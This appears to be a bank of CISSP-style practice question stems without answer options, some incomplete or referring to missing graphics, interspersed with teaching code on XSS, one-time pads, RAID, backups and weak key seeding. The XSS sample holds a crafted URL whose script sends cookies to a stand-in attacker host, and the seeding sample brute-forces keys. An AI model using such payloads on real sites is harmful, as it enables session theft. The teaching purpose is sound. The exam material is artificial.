Single-choice question: Which of the following antivirus detection methods is the newest in the industry and monitors suspicious code as it executes within the operating system?
Single-choice question: Sally has found out that software programmers in her company are making changes to software components and uploading them to the main software repository without following version control or documenting their changes. This is causing a lot of confusion and has led several teams to use older versions. Which of the following would be the best solution for this situation?
Single-choice question: The following scenario is to be used for questions 27, 28, and 29. Mike is the new CSO of a large pharmaceutical company. He has been asked to revamp the company's physical security program and better align it with the company's information security practices. Mike knows that the new physical security program should be made up of controls and processes that support the following categories: deterrence, delay, detection, assessment, and response.
Single-choice question: A number of attacks can be performed against smart cards. Side-channel attacks are a class of attacks that do not exploit a flaw or weakness in the card's logic; instead they infer secrets from physical characteristics of the device while it operates, such as power consumption, timing, or electromagnetic emissions. Which of the following is not a side-channel attack?
Single-choice question: John is installing a sprinkler system that uses a thermal-fusible link in a data center located in Canada. Which of the following statements is true of the system he is installing?
Single-choice question: Operating systems have evolved and changed over the years. Early operating systems were monolithic and did not segregate critical processes from noncritical processes. As time went on, operating system vendors started to reduce the amount of code that ran in kernel mode: only the absolutely necessary code ran in kernel mode, and the remaining operating system code ran in user mode. This architecture introduced performance issues, which led vendors to reduce the critical operating system functionality to a microkernel and allow the remaining operating system functionality to run in client/server models within kernel mode.
Single-choice question: An access control matrix is used in many operating systems and applications to control access between subjects and objects. What is a column in this type of matrix referred to as?
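As an added illustration (not part of the question bank), the following Python builds a small access control matrix and derives the two views the question is about: a column of the matrix is the access control list (ACL) attached to one object, and a row is the capability list attached to one subject. The subjects, objects and rights are constructed for the example.

```python
"""Access control matrix: one row per subject, one column per object.

Added illustration, not from the question bank; subjects, objects and
rights are constructed sample data.
"""
from typing import Dict, FrozenSet, List

Rights = FrozenSet[str]

# matrix[subject][object] -> the rights that subject holds on that object.
ACM: Dict[str, Dict[str, Rights]] = {
    "alice": {"payroll.db": frozenset({"read", "write"}), "report.txt": frozenset({"read"})},
    "bob":   {"payroll.db": frozenset(),                   "report.txt": frozenset({"read", "write"})},
    "carol": {"payroll.db": frozenset({"read"}),           "report.txt": frozenset()},
}
SUBJECTS: List[str] = list(ACM)
OBJECTS: List[str] = ["payroll.db", "report.txt"]


def acl(obj: str) -> Dict[str, Rights]:
    """A column of the matrix: the access control list bound to one object.
    It answers 'who may touch this object?' and is what most file systems store."""
    return {s: ACM[s][obj] for s in SUBJECTS if ACM[s][obj]}


def capability_list(subject: str) -> Dict[str, Rights]:
    """A row of the matrix: the capability list (ticket list) bound to one subject.
    It answers 'what may this subject touch?'."""
    return {o: rights for o, rights in ACM[subject].items() if rights}


def is_permitted(subject: str, obj: str, right: str) -> bool:
    """Reference-monitor style decision; unknown subjects or objects are denied."""
    return right in ACM.get(subject, {}).get(obj, frozenset())


def views_agree() -> bool:
    """Both views are projections of the same matrix, so every (subject, object,
    right) triple must appear in both the ACL view and the capability view."""
    from_acls = {(s, o, r) for o in OBJECTS for s, rights in acl(o).items() for r in rights}
    from_caps = {(s, o, r) for s in SUBJECTS for o, rights in capability_list(s).items() for r in rights}
    return from_acls == from_caps
```

The practical difference between the two views is where the policy lives: ACLs sit with the object (revoking one user's access to a file is cheap), while capabilities travel with the subject (answering "what can this user reach?" is cheap).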
Single-choice question: Which of the following correctly describes a federated identity and its role within identity management processes?
Single-choice question: What technology within identity management is illustrated in the graphic that follows?
Single-choice question: Sue has been tasked with implementing a number of security controls, including antivirus and antispam software, to protect the company's e-mail system. What type of approach is her company taking to handle the risk posed by the system?
Single-choice question: There are several categories of evidence. How is a witness's oral testimony categorized?
Single-choice question: Marge uses her private key to create a digital signature on a message she is sending to George, but she never shows or shares her private key with George. What is this an example of?
Single-choice question: Susan, an attorney, has been hired to fill a new position at Widgets Inc.: Chief Privacy Officer (CPO). What is the primary function of her new role?
Single-choice question: ACME Inc. paid a software vendor to develop specialized software, and that vendor has since gone out of business. ACME Inc. does not have access to the source code and therefore cannot keep the software updated. What mechanism should the company have put in place to prevent this from happening?
Single-choice question: Which of the following is not considered a countermeasure to port scanning and operating system fingerprinting?
Single-choice question: There are several types of volumetric IDSs. What type of IDS emits a measurable magnetic field and monitors it for disruptions?
Single-choice question: Hanna is the new security manager for a computer consulting company. She has found out that the company has lost intellectual property in the past because malicious employees installed rogue devices on the network and used them to capture sensitive traffic. Hanna needs to implement a solution that ensures only authorized devices are allowed onto the company network. Which of the following IEEE standards was developed for this type of protection?
Single-choice question: Sam plans to establish mobile phone service using personal information he has stolen from his former boss. What type of identity theft is this?
Single-choice question: Which of the following is considered the second generation of programming languages?
Single-choice question: Hannah has been assigned the task of installing Web access management (WAM) software. Which of the following best describes what WAM is commonly used for?
Single-choice question: ______ is a set of extensions to DNS that provides DNS clients (resolvers) with origin authentication of DNS data, reducing the threat of DNS cache poisoning, spoofing, and similar attacks.
Single-choice question: There are several different modes in which block ciphers can operate. Which mode does the graphic that follows portray?
Single-choice question: Before an effective physical security program can be rolled out, a number of steps must be taken. Which of the following steps comes first in the process of rolling out such a program?
Single-choice question: Robert has been given the responsibility of installing doors that provide different types of protection. He has been told to install doors that provide fail-safe, fail-secure, and fail-soft protection. Which of the following statements is true about secure door types?
Single-choice question: As his company's CISO, George needs to demonstrate to the Board of Directors the necessity of a strong risk management program. Which of the following should George use to calculate the company's residual risk?
Single-choice question: Several teams should be involved in carrying out the business continuity plan. Which team is responsible for starting the recovery of the original site?
Single-choice question: Which of the following statements does not correctly describe SOAP and Remote Procedure Calls (RPC)?
Single-choice question: David is preparing a server room at a new branch office. What locking mechanisms should he use for the primary and secondary server room entry doors?
Single-choice question: There are several types of intrusion detection systems (IDSs). What type of IDS builds a profile of an environment's normal activity and assigns an anomaly score to packets based on that profile?
Single-choice question: Cross-site scripting (XSS) is an application security vulnerability usually found in Web applications. What type of XSS vulnerability occurs when a victim is tricked into opening a URL that carries a rogue script designed to steal sensitive information?
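Added example, not from the page: a minimal search page that echoes a query parameter back into its HTML, shown once in the form the question describes (the payload arrives in a crafted URL and is reflected unescaped into the response) and once with output encoding applied. The site, parameter name and payload are constructed for the illustration.

```python
"""Reflected XSS: the victim follows a crafted URL, the server echoes a
query parameter into the page unescaped, and the injected script runs in
the victim's browser with the victim's cookies and session.

Added example, not part of the original page; the search page, parameter
name and payload are invented for illustration."""
import html
from urllib.parse import parse_qs, quote, urlsplit

# A URL an attacker might send to the victim (constructed sample).
CRAFTED_URL = ("https://shop.example/search?q=" +
               quote("<script>fetch('https://evil.example/?c='+document.cookie)</script>"))


def _query_param(url: str, name: str) -> str:
    """Decodes the percent-encoded query string the way a web framework would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def search_page_vulnerable(url: str) -> str:
    """Echoes the 'q' parameter straight into HTML: reflected XSS."""
    q = _query_param(url, "q")
    return f"<h1>Results for: {q}</h1>"


def search_page_fixed(url: str) -> str:
    """Same page with contextual output encoding: '<' becomes '&lt;', so the
    browser renders the payload as text instead of parsing it as markup."""
    q = _query_param(url, "q")
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


def contains_active_script(page: str) -> bool:
    """Crude check used only to contrast the two renderings: a literal
    <script> tag survives in the vulnerable output and not in the fixed one."""
    return "<script" in page.lower()
```

Escaping must match the output context (HTML body here); a value placed inside a JavaScript string or a URL attribute needs the encoding for that context, and a Content-Security-Policy that forbids inline script is the usual second layer of defense.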
Single-choice question: Both de facto standard and proprietary interior routing protocols are in use today. Which of the following is a proprietary interior protocol that chooses the best path between the source and destination?
Single-choice question: The relay agent on a mail server plays a role in spam prevention. Which of the following incorrectly describes mail relays?
Single-choice question: What technology within identity management is illustrated in the graphic that follows?
Single-choice question: The common law system is broken down into which of the following categories?
Single-choice question: There are many different types of access control mechanisms that are commonly embedded into all operating systems. Which of the following is the mechanism that is missing from this graphic?
Single-choice question: The integrity of data is not related to which of the following?
Single-choice question: Sam is the security manager of a company that makes most of its revenue from its intellectual property. Sam has implemented a process improvement program that has been certified by an outside entity. His company was rated at Level 2 during an appraisal, and he is putting steps in place to raise this to Level 3. A year ago, when Sam carried out a risk analysis, he determined that the company was at too much risk of losing trade secrets. The countermeasure his team implemented reduced this risk, and Sam has determined that the annualized loss expectancy for a trade secret being stolen once in a hundred-year period is now $400.
Single-choice question: Which of the following is not an effective countermeasure against spam?
Single-choice question: Which of the following best describes how SAML, SOAP, and HTTP commonly work together in an environment that provides Web services?
Single-choice question: A change management process should include a number of procedures. Which of the following incorrectly describes a characteristic or component of a change control policy?
Single-choice question: NIST has defined best practices for creating continuity plans. Which of the following phases deals with identifying and prioritizing critical functions and systems?
Single-choice question: Brian has been asked to work on the virtual directory of his company's new identity management system. Which of the following best describes a virtual directory?
Single-choice question: The Information Technology Infrastructure Library (ITIL) consists of five sets of instructional books. Which of the following is considered the core set and focuses on the overall planning of the intended IT services?
Single-choice question: The following scenario will be used to answer questions 30, 31, and 32. Jeff is leading the business continuity group in his company. They have completed a business impact analysis and have determined that if the company's credit card processing functionality were unavailable for 48 hours, the company would most likely take such a large financial hit that it would have to go out of business. The team has calculated that this functionality needs to be up and running within 28 hours after a disaster for the company to stay in business. The team has also determined that the restoration steps must be able to restore data that are no more than one hour old.
Single-choice question: Which of the following is not a responsibility of the memory manager?
Single-choice question: There are four categories of software licensing. Which of the following refers to software sold at a reduced cost?
Single-choice question: Which type of WAN tunneling protocol is missing from the table that follows?
Single-choice question: Which of the following describes deferred commitment in object-oriented programming?
Single-choice question: The following scenario will be used for questions 26, 27, and 28. Trent is the new manager of his company's internal software development department. He has been told by his management that the group needs to be compliant with the international standard that provides guidance to organizations on integrating security into the processes used for managing their applications. His new boss told him that he should join and get familiar with the Web Application Security Consortium, and Trent has just received an e-mail stating that one of the company's currently deployed applications has a zero-day vulnerability.
Single-choice question: Certain types of attacks have been made more potent by which of the following advances in microprocessor technology?
Single-choice question: Organizations should keep system documentation on hand to ensure that the system is properly cared for, that changes are controlled, and that the organization knows what is on the system. What does not need to be in this type of documentation?
Single-choice question: Sally is carrying out a software analysis of her company's proprietary application. She has found that it is possible for an attacker to force an authorization step to take place before the authentication step has completed successfully. What type of issue would allow this type of compromise to take place?
Single-choice question: Authorization creep is to access control what scope creep is to software development. Which of the following is not true of authorization creep?
Single-choice question: Different access control models provide specific types of security measures and functionality in applications and operating systems. What model is being expressed in the graphic that follows?
Single-choice question: It is not unusual for business continuity plans to become out of date. Which of the following is not a reason why plans become outdated?
Single-choice question: What type of exploited vulnerability allows more input than the program has allocated space to store?
Single-choice question: To what phase of a business continuity plan does a company proceed when it is ready to move back into its original site or a new site?
Single-choice question: Paisley is helping her company identify potential site locations for a new facility. Which of the following is not an important factor when choosing a location?
Single-choice question: Which of the following incorrectly describes the concept of executive succession planning?
Single-choice question: The following scenario is to be used for questions 30, 31, and 32. Greg is the facility security officer of a financial institution. His boss has told him that visitors need a secondary screening before they are allowed into sensitive areas within the building. Greg has also been told by the network administrators that since the new HVAC system was installed throughout the facility, they have noticed that the power voltage to the systems in the data center sags.
Single-choice question: Widgets Inc.'s software development processes are documented and the organization is capable of producing its own standard of software processes. Which of the following Capability Maturity Model Integration levels best describes Widgets Inc.?
Single-choice question: There are two main functions that Trusted Platform Modules (TPMs) carry out within systems today. Which of the following best describes these two functions?
Single-choice question: There are several different types of databases. Which type does the graphic that follows illustrate?
Single-choice question: What discipline combines the physical environment and the sociological issues that surround it to reduce crime rates and the fear of crime?
Single-choice question: Here is a graphic of a business continuity policy. Which component is missing from this graphic?
Single-choice question: There are several different types of centralized access control protocols. Which of the following is illustrated in the graphic that follows?
Single-choice question: Which of the following is the best description of a component-based system development method?
Single-choice question: Cyberlaw categorizes computer-related crime into three categories. Which of the following is an example of a crime in which the use of a computer would be categorized as incidental?
Single-choice question: Which of the following refers to the amount of time it is expected to take to get a device fixed and back into production?
Single-choice question: There are several types of password management approaches used by identity management systems. Which of the following reduces help-desk call volume but is also criticized for the ease with which an attacker could gain access to multiple resources if a single password is compromised?
Single-choice question: What type of technology is represented in the graphic that follows?
Single-choice question: As a CISSP candidate, you must sign a Code of Ethics. Which of the following is from the (ISC)² Code of Ethics for the CISSP?
Single-choice question: Charlie is a new security manager at a textile company that develops its own proprietary software for internal business processes. Charlie has been told that the new application his team needs to develop must comply with the ISO/IEC 42010 standard. He has found out that many of the critical applications have been developed in the C programming language and has asked for these applications to be reviewed for a specific class of security vulnerabilities.
Single-choice question: Preplanned business continuity procedures provide organizations with a number of benefits. Which of the following is not a capability enabled by business continuity planning?
Single-choice question: Erasure is the end of the media life cycle for media that contain sensitive information. Which of the following best describes purging?
Single-choice question: Two commonly used networking protocols are TCP and UDP. Which of the following correctly describes the two?
Single-choice question: After a disaster occurs, a damage assessment needs to take place. Which of the following steps occurs last in a damage assessment?
Single-choice question: In computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling?
Single-choice question: Which of the following does not describe privacy-aware role-based access control?
Single-choice question: What type of infrastructural setup is illustrated in the graphic that follows?
Single-choice question: There are many types of viruses that attackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus?
Single-choice question: What are the three types of policies that are missing from the following graphic?
Single-choice question: The Recovery Time Objective (RTO) and Maximum Tolerable Downtime (MTD) metrics have similar roles, but their values are very different. Which of the following best describes the difference between the RTO and MTD metrics?
Single-choice question: Angela wants to group computers together by department to make it easier for them to share network resources. Which of the following will allow her to group computers logically?
Single-choice question: If implemented properly, a one-time pad is a perfect encryption scheme. Which of the following incorrectly describes a requirement for its implementation?
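Added example, not from the page: a one-time pad in Python together with what goes wrong when one of its requirements (never reuse the pad) is violated. The messages are constructed; the pad comes from the OS CSPRNG, which stands in for the truly random source a real pad needs.

```python
"""One-time pad: perfect secrecy holds only if the key is truly random,
at least as long as the message, kept secret, and used exactly once.

Added illustration, not from the page; the plaintexts are constructed and
secrets.token_bytes stands in for a true random source."""
import secrets


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR; truncates to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def new_pad(length: int) -> bytes:
    """Fresh key material from the OS CSPRNG, one byte per plaintext byte."""
    return secrets.token_bytes(length)


def otp_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Requirement enforced here: the pad is exactly as long as the message."""
    if len(key) != len(plaintext):
        raise ValueError("one-time pad key must be exactly as long as the message")
    return xor(plaintext, key)


otp_decrypt = otp_encrypt  # XOR is its own inverse


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If the same pad encrypted both messages, XORing the ciphertexts
    cancels the key: c1 ^ c2 == p1 ^ p2.  The key is gone, the
    relationship between the plaintexts is exposed."""
    return xor(c1, c2)


def crib_drag(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """With the pad reused, an attacker who knows (or guesses) p1 reads p2
    outright: (c1 ^ c2) ^ p1 == p2."""
    return xor(two_time_pad_leak(c1, c2), known_p1)
```

The same cancellation is why any stream cipher (or CTR-mode block cipher) that repeats a key stream is broken: reuse of the nonce/key pair is the modern form of the two-time pad.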
Single-choice question: Which of the following is a common association of the Clark-Wilson access control model?
Single-choice question: There are two main types of symmetric ciphers: stream and block. Which of the following is not an attribute of a good stream cipher?
Single-choice question: There are several different types of authentication technologies. Which type is being shown in the graphic that follows?
Single-choice question: For what purpose was the COSO framework developed?
Single-choice question: High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running at the necessary level. To provide this level of availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Which of the following best describes these characteristics?
Single-choice question: There are several security enforcement components that are commonly built into operating systems. Which component is illustrated in the graphic that follows?
Single-choice question: The following scenario will be used for questions 30 and 31. Stephanie has been put in charge of developing the incident response and forensics procedures her company needs to carry out if an incident occurs. She needs to ensure that their procedures map to the international principles for gathering and protecting digital evidence. She also needs to ensure that if and when internal forensics teams are deployed, they have labels, tags, evidence bags, cable ties, imaging software, and other associated tools.
Single-choice question: An outline for a physical security design should include program categories and the necessary countermeasures for each. To what category do locks and access controls belong?
Single-choice question: A multitasking operating system can have several processes running at the same time. What are the components within the processes that are shown in the graphic that follows?
Single-choice question: RAID systems use a number of techniques to provide redundancy and performance. Which of the following activities divides data and writes it across several drives?
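Added illustration, not from the page: the striping operation the question refers to, first on its own (RAID 0, performance but no redundancy) and then combined with rotating parity (RAID 5), so that the array can rebuild one failed drive from the survivors. The "drives" are Python lists of fixed-size chunks and the chunk size is tiny so the arrays are readable; real stripe units are tens of kilobytes.

```python
"""Striping and parity.  Added illustration, not from the page; the
'drives' are Python lists of fixed-size chunks and CHUNK is tiny so the
arrays stay readable."""
from typing import List, Optional

CHUNK = 4  # bytes per stripe unit (real stripe units are tens of KB)


def xor(*units: bytes) -> bytes:
    """Bytewise XOR of equal-length units: the parity operation."""
    out = bytearray(units[0])
    for u in units[1:]:
        for i, b in enumerate(u):
            out[i] ^= b
    return bytes(out)


def _chunks(data: bytes, units_per_stripe: int) -> List[bytes]:
    pad = (-len(data)) % (CHUNK * units_per_stripe)  # fill the last stripe
    data = data + b"\0" * pad
    return [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]


def raid0_write(data: bytes, n_drives: int) -> List[List[bytes]]:
    """RAID 0 striping: chunks are dealt round-robin across the drives.
    Throughput scales with the drive count, but losing any drive loses everything."""
    drives: List[List[bytes]] = [[] for _ in range(n_drives)]
    for i, unit in enumerate(_chunks(data, n_drives)):
        drives[i % n_drives].append(unit)
    return drives


def raid0_read(drives: List[List[bytes]], length: int) -> bytes:
    n = len(drives)
    out = b"".join(drives[i % n][i // n] for i in range(n * len(drives[0])))
    return out[:length]


def raid5_write(data: bytes, n_drives: int) -> List[List[bytes]]:
    """RAID 5: each stripe holds n_drives-1 data units plus one parity unit,
    and the parity position rotates so no single drive becomes the bottleneck."""
    n_data = n_drives - 1
    units = _chunks(data, n_data)
    drives: List[List[bytes]] = [[] for _ in range(n_drives)]
    for s in range(len(units) // n_data):
        stripe = units[s * n_data:(s + 1) * n_data]
        parity_drive = s % n_drives
        it = iter(stripe)
        for d in range(n_drives):
            drives[d].append(xor(*stripe) if d == parity_drive else next(it))
    return drives


def can_recover(drives: List[Optional[List[bytes]]]) -> bool:
    """RAID 5 tolerates exactly one failed (None) drive."""
    return sum(d is None for d in drives) <= 1


def raid5_read(drives: List[Optional[List[bytes]]], length: int) -> bytes:
    """Reads the data back; a drive given as None is treated as failed and its
    units are rebuilt as the XOR of the surviving units in each stripe."""
    if not can_recover(drives):
        raise RuntimeError("RAID 5 survives only one failed drive")
    failed = [d for d, drv in enumerate(drives) if drv is None]
    n_drives = len(drives)
    n_stripes = len(next(drv for drv in drives if drv is not None))
    out = bytearray()
    for s in range(n_stripes):
        row = [drv[s] if drv is not None else b"" for drv in drives]
        if failed:
            row[failed[0]] = xor(*(u for u in row if u))  # parity rebuild
        parity_drive = s % n_drives
        out += b"".join(row[d] for d in range(n_drives) if d != parity_drive)
    return bytes(out[:length])
```

Striping alone is a performance technique; it is the parity (or mirroring) layered on top that provides the redundancy. Note that neither protects against deletion, corruption or ransomware, which is why RAID is not a backup.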
Single-choice question: Bethany is working on a mandatory access control (MAC) system. She has been working on a file that was classified as Secret. She can no longer access this file because it has been reclassified as Top Secret. She deduces that the project she was working on has just increased in confidentiality and that she now knows more about this project than her clearance and need-to-know allow. Which of the following refers to a concept that attempts to prevent this type of scenario from occurring?
Single-choice question: What type of risk analysis approach does the following graphic depict?
Single-choice question: As with logical access controls, audit logs should be produced and monitored for physical access controls. Which of the following statements is correct about auditing physical access?
Single-choice question: What type of fence detects whether someone attempts to climb or cut it?
Single-choice question: John is responsible for providing a weekly report to his manager outlining the week's security incidents and mitigation steps. What steps should he take if a report has no information?
Single-choice question: What is the missing second step in the graphic that follows?
Single-choice question: What type of telecommunication technology is illustrated in the graphic that follows?
Single-choice question: Layer 2 of the OSI model has two sublayers. What are those sublayers, and what are two IEEE standards that describe technologies at that layer?
Single-choice question: What type of technology is represented in the graphic that follows?
Single-choice question: There are several different types of authentication technologies. Which type is being shown in the graphic that follows?
Single-choice question: There are different ways that operating systems can carry out software I/O procedures. Which of the following is used when the CPU sends data to an I/O device and then works on another process's request until the I/O device is ready for more data?
Single-choice question: Risk assessment has several different methodologies. Which of the following official risk methodologies was not created for the purpose of analyzing security risks?
Single-choice question: What are the three types of policies that are missing from the following graphic?
Single-choice question: Which of the following occurs in a PKI environment?
Single-choice question: A multitasking operating system can have several processes running at the same time. What are the components within the processes that are shown in the graphic that follows?
Single-choice question: What type of security encryption component is missing from the table that follows?
Single-choice question: The operations team is responsible for defining which data get backed up and how often. Which type of backup process backs up the files that have been modified since the last time all data were backed up?
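Added illustration, not from the page: a simulation of how full, differential and incremental backups select files via the archive bit, and what each strategy needs at restore time. The volume, file names and sequence of changes are constructed.

```python
"""Full, differential and incremental backups selected via the archive bit.

Added illustration, not from the page; the volume and its files are constructed."""
from typing import Dict, List, Set


class Volume:
    """Files plus an 'archive' flag that the OS sets on every write."""

    def __init__(self) -> None:
        self.files: Dict[str, str] = {}   # name -> content
        self.archive: Set[str] = set()    # modified since the last full/incremental backup

    def write(self, name: str, content: str) -> None:
        self.files[name] = content
        self.archive.add(name)

    def backup(self, kind: str) -> Dict[str, str]:
        if kind == "full":
            selected = set(self.files)            # everything, flagged or not
        elif kind in ("differential", "incremental"):
            selected = set(self.archive)          # only files flagged as changed
        else:
            raise ValueError(f"unknown backup kind: {kind}")
        snapshot = {n: self.files[n] for n in selected}
        # Full and incremental backups clear the flag; a differential does not,
        # so each differential keeps growing until the next full backup.
        if kind != "differential":
            self.archive -= selected
        return snapshot


def simulate(kind: str) -> List[Dict[str, str]]:
    """Run the same sequence of changes against a fresh volume and return what
    each backup captured: a full backup first, then two backups of `kind`."""
    vol = Volume()
    vol.write("a.doc", "a1")
    vol.write("d.txt", "d1")
    backups = [vol.backup("full")]
    vol.write("b.xls", "b1")
    backups.append(vol.backup(kind))
    vol.write("c.ppt", "c1")
    vol.write("a.doc", "a2")                      # a.doc modified again
    backups.append(vol.backup(kind))
    return backups


def restore(backups: List[Dict[str, str]]) -> Dict[str, str]:
    """Apply backups oldest to newest; later copies overwrite earlier ones."""
    state: Dict[str, str] = {}
    for b in backups:
        state.update(b)
    return state
```

The trade-off follows directly: a differential restore needs only the last full backup plus the latest differential (fewer tapes, faster restore, larger nightly backups), while an incremental restore needs the last full backup plus every incremental since, in order.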
Single-choice question: The following scenario will be used for questions 28 and 29. Jack has been told that successful attacks have been taking place and that data encrypted by his company's software systems have leaked to the company's competitors. Through his investigation, Jack has discovered that a lack of randomness in the seed values used by the encryption algorithms in the company's software produced patterns that allowed successful reverse engineering.
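Added example, not the company's code from the scenario: a key derived from a deterministic PRNG seeded with a low-entropy value (a timestamp in seconds), the attacker's brute-force recovery of that seed from a known-plaintext prefix, and the fix of drawing key material from the OS CSPRNG instead. The key derivation, message and timestamps are constructed for illustration.

```python
"""Predictable seeds make 'random' keys recoverable.

Added illustration, not the scenario company's code; the key derivation,
message and timestamp window are constructed."""
import random
import secrets
from typing import Optional, Tuple

KEY_LEN = 16  # bytes


def weak_key(seed: int) -> bytes:
    """Key stream from a deterministic PRNG seeded with a low-entropy value
    such as the time in seconds.  Anyone who can guess the seed regenerates
    exactly the same key; this is the flaw in the scenario."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(KEY_LEN))


def strong_key() -> bytes:
    """The fix: key material from the OS CSPRNG, not a seeded PRNG."""
    return secrets.token_bytes(KEY_LEN)


def xor(a: bytes, b: bytes) -> bytes:
    """Stand-in for the cipher: XOR with the key (truncates to the shorter)."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_seed(ciphertext: bytes, known_plaintext: bytes,
                 t_start: int, t_end: int) -> Optional[Tuple[int, bytes]]:
    """Attacker's side: try every seed in a window (for example an hour either
    side of the file's timestamp) and keep the one whose key turns the
    ciphertext prefix into the known plaintext.  Returns (seed, key) or None."""
    target = xor(ciphertext[:len(known_plaintext)], known_plaintext)  # key prefix
    for seed in range(t_start, t_end + 1):
        key = weak_key(seed)
        if key[:len(target)] == target:
            return seed, key
    return None
```

A seed space of a few thousand candidates is searched in milliseconds; even a full 32-bit seed is only about four billion trials. The defense is not a bigger seed for the same PRNG but a generator designed for secrets (the OS CSPRNG, or a hardware RNG feeding it).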
Single-choice question: Management support is critical to the success of a business continuity plan. Which of the following is the most important thing to provide to management in order to obtain their support?
Single-choice question: What type of risk analysis approach does the following graphic depict?
Single-choice question: Which of the following tells a packet where to go and how to communicate with the right service or protocol on the destination computer?
Single-choice question: Which of the following best describes an object-oriented database?
Single-choice question: IDSs can detect intruders by employing electromechanical systems or volumetric systems. Which of the following correctly describes these systems?
Single-choice question: Tom works at a large retail company that recently deployed radio-frequency identification (RFID) to better manage its inventory processes. Employees use scanners to gather product-related information instead of manually looking up product data. Tom has found out that malicious customers have carried out attacks on the RFID technology to reduce the amount they pay for store items. Which of the following is the most likely reason for the existence of this type of vulnerability?
Single-choice question: Jill is establishing a companywide sales program that will require different user groups with different privileges to access information in a centralized database. How should the security manager secure the database?
Single-choice question: Which of the following is a legal form of eavesdropping when performed with prior consent or a warrant?
Single-choice question: As his company's business continuity coordinator, Matthew is responsible for helping recruit members for the business continuity planning (BCP) committee. Which of the following does not correctly describe this effort?
Single-choice question: Different types of material are built into walls and other constructs of various types of buildings and facilities. What type of material is shown in the following photo?
Single-choice question: Which of the following is a correct description of the pros and cons associated with third-generation programming languages?
Single-choice question: Several different types of smoke and fire detectors can be used. What type of detector is shown in the following graphic?
Single-choice question: Guidelines should be followed to allow secure remote administration. Which of the following is not one of those guidelines?
Single-choice question: There are different approaches to regulation. Which of the following is an example of self-regulation?
Single-choice question: Gizmos and Gadgets has restored its original facility after a disaster. What should be moved back in first?
Single-choice question: Electrical power is increasingly provided through smart grids, which allow for self-healing, resistance to physical attacks and cyberattacks, increased efficiency, and better integration of renewable energy sources. Countries want their grids to be more reliable, resilient, flexible, and efficient. Why does this type of evolution in power infrastructure concern many security professionals?
